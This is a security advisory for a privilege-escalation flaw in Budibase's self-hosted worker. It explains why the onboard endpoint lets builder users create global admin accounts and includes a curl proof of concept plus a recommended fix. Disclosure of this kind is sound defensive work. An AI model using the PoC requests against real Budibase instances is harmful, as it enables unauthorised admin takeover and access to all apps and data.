PT-2026-41795 · Npm · @Budibase/Worker
Published
2026-05-18
·
Updated
2026-05-18
·
CVE-2026-45716
CVSS v3.1
8.8
High
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
Summary
The
POST /api/global/users/onboard endpoint is protected by workspaceBuilderOrAdmin middleware, allowing any user with builder permissions to access it. When SMTP email is not configured (the default for self-hosted Budibase instances), this endpoint bypasses the admin-restricted invite flow and directly creates users via bulkCreate, accepting arbitrary admin and builder role assignments from the request body. A builder-level user can create a new global admin account and receive the generated password in the response, achieving full privilege escalation.Details
The vulnerability stems from a mismatch between the authorization level of the
onboardUsers endpoint and the user-creation capabilities it exposes when SMTP is not configured.Route definition (
packages/worker/src/api/routes/global/users.ts:93-109):builderOrAdminRoutes // <-- allows builders, not just admins
.post(
"/api/global/users/onboard",
buildInviteMultipleValidation(),
controller.onboardUsers
)Compare with the
invite and inviteMultiple endpoints which are correctly admin-only:adminRoutes // <-- admin only
.post("/api/global/users/invite", buildInviteValidation(), controller.invite)
.post("/api/global/users/multi/invite", buildInviteMultipleValidation(), controller.inviteMultiple)Controller (
packages/worker/src/api/controllers/global/users.ts:601-630):export const onboardUsers = async (ctx) => {
if (await isEmailConfigured()) {
await inviteMultiple(ctx) // admin-only path (delegates to invite flow)
return
}
// No SMTP → directly create users with attacker-controlled roles
const users = ctx.request.body.map(invite => {
const password = generatePassword(12)
createdPasswords[invite.email] = password
return {
email: invite.email,
password,
forceResetPassword: true,
roles: invite.userInfo.apps || {},
admin: { global: !!invite.userInfo.admin }, // <-- attacker-controlled
builder: invite.userInfo.builder, // <-- attacker-controlled
tenantId: tenancy.getTenantId(),
}
})
let resp = await userSdk.db.bulkCreate(users)
for (const user of resp.successful) {
user.password = createdPasswords[user.email] // <-- password returned!
}
ctx.body = { ...resp, created: true }
}Middleware pass-through (
packages/backend-core/src/middleware/workspaceBuilderOrAdmin.ts:10-26):In the worker context (
env.isWorker() is true), when there is no workspaceId parameter in the request (which there isn't for the onboard endpoint), the middleware at line 19 checks !workspaceId && env.isWorker() — this is true, so it falls through to line 21 which only checks hasBuilderPermissions. Any global builder passes.Validation gap (
buildInviteMultipleValidation at line 37-45): The Joi schema validates userInfo as Joi.object().optional() with no constraints on its contents, so admin and builder fields pass through.No downstream check:
bulkCreate and buildUser do not strip or validate admin/builder fields — they are written directly to the user document in CouchDB.PoC
Prerequisites: A self-hosted Budibase instance (default: no SMTP configured) and a user account with builder-level access.
Step 1: Authenticate as a builder user and obtain the session cookie:
# Login as builder
curl -s -c cookies.txt -X POST 'http://localhost:10000/api/global/auth/default/login'
-H 'Content-Type: application/json'
-d '{"username":"builder@example.com","password":"builderpassword"}'Step 2: Create a new global admin user via the onboard endpoint:
curl -s -X POST 'http://localhost:10000/api/global/users/onboard'
-H 'Content-Type: application/json'
-b cookies.txt
-d '[{"email":"pwned-admin@attacker.com","userInfo":{"admin":{"global":true}}}]'Expected response (includes the generated password):
{
"successful": [{"email":"pwned-admin@attacker.com","password":"<generated-12-char-password>","admin":{"global":true},...}],
"unsuccessful": [],
"created": true
}Step 3: Login as the new admin:
curl -s -X POST 'http://localhost:10000/api/global/auth/default/login'
-H 'Content-Type: application/json'
-d '{"username":"pwned-admin@attacker.com","password":"<password-from-step-2>"}'The attacker now has full global admin access.
Impact
- Privilege escalation: Any builder-level user can escalate to global admin on self-hosted Budibase instances without SMTP configured (the default deployment).
- Full platform compromise: Global admin can access all apps, all data sources, manage all users, delete apps, and modify platform configuration.
- Credential exposure: The generated password is returned in the HTTP response, giving the attacker immediate access to the new admin account.
- Stealth: The created user appears as a legitimately onboarded user, making detection difficult without audit log review.
- Wide applicability: Self-hosted Budibase instances commonly run without SMTP configuration, making this the default-exploitable path.
Recommended Fix
Move the
onboardUsers route from builderOrAdminRoutes to adminRoutes to match the authorization level of invite and inviteMultiple:--- a/packages/worker/src/api/routes/global/users.ts
+++ b/packages/worker/src/api/routes/global/users.ts
-builderOrAdminRoutes
+adminRoutes
.post(
"/api/global/users/onboard",
buildInviteMultipleValidation(),
controller.onboardUsers
)Additionally, the
onboardUsers controller should validate that the caller has sufficient permissions to assign the requested role level. Even admin users should not be able to create users with roles exceeding their own. Consider adding explicit validation in the controller:// In onboardUsers, before bulkCreate:
for (const invite of ctx.request.body) {
if (invite.userInfo.admin && !ctx.user.admin?.global) {
ctx.throw(403, "Only admins can create admin users")
}
}Fix
Improper Privilege Management
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
@Budibase/Worker